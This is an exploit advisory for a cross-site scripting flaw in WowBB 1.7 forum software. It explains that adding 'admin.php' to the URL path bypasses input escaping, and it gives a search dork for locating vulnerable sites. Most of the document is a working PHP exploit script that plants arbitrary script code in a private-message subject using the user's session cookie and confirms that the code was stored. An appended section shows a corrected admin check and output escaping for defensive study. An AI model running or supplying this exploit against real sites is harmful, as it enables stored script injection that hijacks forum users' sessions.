WowBB <= 1.7 XSS Vulnerabilities

Posted on 14 June 2010

================================ WowBB <= 1.7 XSS Vulnerabilities ================================

Name:          WowBB <= 1.7 XSS
Software:      WowBB <= 1.7
Site:          http://www.wowbb.com/
Download:      WowBB is NOT free.
Vulnerability: Cross Site Scripting
Severity:      medium ( low / medium / high )
Tested on:     1.7
Dork:          "Powered by WowBB"

Author:  Lord-Anubis
Contact: lord.anu bis4[at]gm ail[dot]com
Date:    15.06.2010 ( dd.mm.yyyy )
Site:    http://lordanubis.altervista.org/

Bug File: lib.php

587. if ((strpos($HTTP_SERVER_VARS["PHP_SELF"], "admin.php") === false) and ($xss_protect) and (key($a) != "message"))
588.     $a[key($a)] = htmlspecialchars(current($a));

Bug Explanation:

- EN: In the file lib.php the POST/GET superglobal arrays are sanitised by the function array_addslashes(). This function applies addslashes() if magic_quotes_gpc is enabled in php.ini, and applies htmlspecialchars() only when the user is not browsing the file admin.php. Because the check at line 587 only tests whether PHP_SELF contains "admin.php", the bug is exploitable when the string "admin.php" is inserted into the URL. This example is not usable as-is, but it is needed to understand the bug:

  1) http://www.[site].com/[path]/index.php?var=<script>alert(1)</script>            <--- is sanitised
  2) http://www.[site].com/[path]/index.php/admin.php?var=<script>alert(1)</script>  <--- is NOT sanitised

- ITA (translated): In the file lib.php the POST/GET superglobal arrays are sanitised by the function array_addslashes(), which uses addslashes() if magic_quotes_gpc is set to 1 in php.ini and uses htmlspecialchars() if the user is NOT in the file admin.php. The bug can be exploited by making the application believe we are in the administration panel and consequently injecting JavaScript code without it being sanitised. An example that is not workable, but gives the idea, is:

  1) http://www.[site].com/[path]/index.php?var=<script>alert(1)</script>            <--- is sanitised
  2) http://www.[site].com/[path]/index.php/admin.php?var=<script>alert(1)</script>  <--- is NOT sanitised

- PL (translated): In the file lib.php the POST/GET superglobal array is cleaned by the function array_addslashes(); this function uses addslashes() when magic_quotes_gpc is set to 1 in php.ini, and uses htmlspecialchars() when the user is not in the administration panel. By putting admin.php in the URL one can pretend to be in the administration panel and inject JavaScript code. This example is not workable, but it helps to understand:

  1) http://www.[site].com/[path]/index.php?var=<script>alert(1)</script>            <--- is cleaned
  2) http://www.[site].com/[path]/index.php/admin.php?var=<script>alert(1)</script>  <--- is NOT cleaned

Exploit:

<?php
/**
 * exploit.php
 *
 * Software: WowBB <= 1.7
 * Author: Lord-Anubis <lord.anu bis4[at]gm ail[dot]com>
 * Vulnerability: Cross Site Scripting
 */
//
error_reporting(0);
ini_set("max_execution_time", 0);
ini_set("default_socket_timeout", 5);
//
// Send a raw HTTP request to $hostName:80 and return the full response.
function sendPacket($packet)
{
    global $hostName;
    $html = '';
    if (!$sock = fsockopen(gethostbyname($hostName), 80)) {
        exit("[-] No response from '{$hostName}'\n");
    }
    fputs($sock, $packet);
    while (!feof($sock)) {
        $html .= fgets($sock);
    }
    fclose($sock);
    return $html;
}
//
// Five arguments are required, so $argc (which counts the script name) must be at least 6.
if ($argc < 6) {
    exit(
        "[+] Software: WowBB <= 1.7\n".
        "[+] Author: Lord-Anubis\n".
        "[+] Vulnerability: Cross Site Scripting\n".
        "[+] Usage: ./exploit [hostName] [path] [evilUserName] [yourCookie] [Code]\n".
        "[+] Example:\n".
        "[+] ./exploit 127.0.0.1 / admin anubis%7C%7C9f55c7e99c128fb18b0ce725a8c2bdea <script>[...]</script>\n".
        "[+] ./exploit hostname.com /wowbb/ mod mark%7C%7Cea82410c7a9991816b5eeeebe195e20a <h1>lol</h1>\n"
    );
}
//
$hostName = $argv[1];
$path     = $argv[2];
$userName = $argv[3];
$cookie   = $argv[4];
$evilCode = $argv[5];
//
if (count(explode("%7C", $cookie)) < 3) {
    exit("[-] Your cookie is invalid\n");
}
//
// Send a private message; "/admin.php" as path info makes lib.php skip htmlspecialchars().
$postData = "message=Hello_Bro&spell_check=&preview_pm=&post_pm=1&pm_to=$userName&pm_subject=$evilCode";
$packet  = "POST http://{$hostName}{$path}pm.php/admin.php HTTP/1.1\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Host: {$hostName}\r\n";
$packet .= "Content-Length: ".strlen($postData)."\r\n";
$packet .= "Cookie: wowbb=$cookie;\r\n";
$packet .= "Connection: Close\r\n\r\n"; // without this the read loop waits for the server to time out
$packet .= $postData;
sendPacket($packet);
//
// Fetch the sent-items folder and look for the unescaped subject.
$packet  = "GET http://{$hostName}{$path}pm.php?folder_id=101 HTTP/1.0\r\n";
$packet .= "Host: {$hostName}\r\n";
$packet .= "Cookie: wowbb=$cookie;\r\n";
$packet .= "Connection: Close\r\n\r\n";
if (preg_match('/<a id="link[0-9]+" href="javascript:show_message\([0-9]+\)">'.preg_quote($evilCode, '/').'<\/a>/is', sendPacket($packet))) {
    exit("[+] Exploit successful\n");
} else {
    exit("[-] Exploit failed\n");
}
?>

# Inj3ct0r.com [2010-06-14]
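The root cause at lib.php line 587 is that PHP_SELF is SCRIPT_NAME followed by the client-supplied PATH_INFO, so a substring test on it can be steered by the request path. The following is an added example, not WowBB's code, that contrasts that test with one based on SCRIPT_NAME and shows output-time escaping; the function names and the $_SERVER fragments are constructed for the example.

```php
<?php
// Added example (not WowBB's code): the admin-area test from lib.php line 587
// next to one the request path cannot steer, plus escaping at output time,
// which removes the need for an admin exemption in the first place.
// PHP_SELF = SCRIPT_NAME + PATH_INFO, so its tail is chosen by the client.

function isAdminAreaVulnerable(array $server): bool
{
    // The advisory's check: a substring test on PHP_SELF.
    return strpos($server['PHP_SELF'], 'admin.php') !== false;
}

function isAdminAreaFixed(array $server): bool
{
    // SCRIPT_NAME names the script the server actually executed; PATH_INFO
    // ("/admin.php" in the bypass request) is never part of it.
    return basename($server['SCRIPT_NAME']) === 'admin.php';
}

// Escape when rendering into HTML instead of mutating the input arrays.
function escapeHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed $_SERVER fragments for the two requests shown in the advisory
// plus a genuine admin request.
$cases = [
    '/index.php?var=...'           => ['PHP_SELF' => '/index.php',           'SCRIPT_NAME' => '/index.php'],
    '/index.php/admin.php?var=...' => ['PHP_SELF' => '/index.php/admin.php', 'SCRIPT_NAME' => '/index.php'],
    '/admin.php'                   => ['PHP_SELF' => '/admin.php',           'SCRIPT_NAME' => '/admin.php'],
];

foreach ($cases as $request => $server) {
    printf("%-32s substring check: %-5s  basename check: %s\n",
        $request,
        isAdminAreaVulnerable($server) ? 'admin' : 'user',
        isAdminAreaFixed($server) ? 'admin' : 'user');
}
// On the second request the substring check reports "admin" (so the original
// code skips htmlspecialchars()) while the basename check still reports "user".

// Output-time escaping of a constructed untrusted subject, applied regardless
// of which area the request claims to be in.
echo escapeHtml('<script>alert(1)</script>'), "\n";
```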